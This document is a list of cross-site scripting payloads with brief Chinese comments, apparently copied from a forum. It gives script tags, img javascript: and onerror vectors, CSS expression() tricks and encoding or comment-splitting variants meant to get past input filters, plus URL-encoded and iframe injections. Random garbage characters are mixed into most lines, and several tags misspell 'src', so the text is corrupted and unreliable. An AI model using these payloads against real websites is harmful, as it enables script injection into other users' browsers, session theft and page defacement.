<script>alert("跨站")</script> (最常用)
3 R( ?7 Z1 U3 l0 F, N3 K<img scr=javascript:alert("跨站")></img>
7 s2 n* p+ t s( t0 i0 D<img scr="javascript: alert(/跨站/)></img>8 |! U7 M' r/ f) @" r7 G
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
; M6 Y' F# d9 @5 E1 `- v1 O& m<img scr="#" onerror=alert(/跨站/)></img>* v, f) K3 U! z( `6 j P/ a' n$ }
<img scr="#" style="xss:expression(alert(/xss/));"></img> D! B! G# N9 {1 i; }$ s7 Q
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)7 u- {& x% a. y p" ]/ K8 O
<img src=vbscript:msgbox ("xss")></img>
" D: g7 g$ C3 d. _3 b<style> input {left:expression (alert('xss'))}</style>; e1 W; i# [: i& Q
<div style={left:expression (alert('xss'))}></div>
: t2 a- E6 P. k U$ a- C7 O- ~7 _/ c<div style={left:exp/* */ression (alert('xss'))}></div>0 r5 A6 u( ?3 E) P& S4 V# G8 h4 {
<div style={left:\0065\0078ression (alert('xss'))}></div>
& j& ]" q5 L# ]+ W6 ghtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>, P+ B L+ M- c' o" u6 M+ a
unicode <div style="{left:expRessioN (alert('xss'))}">$ l; K2 p, J3 [$ P- E9 A
1 Z8 R9 }3 i0 c4 ~9 W"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["4 e- }$ W/ o* w9 j
|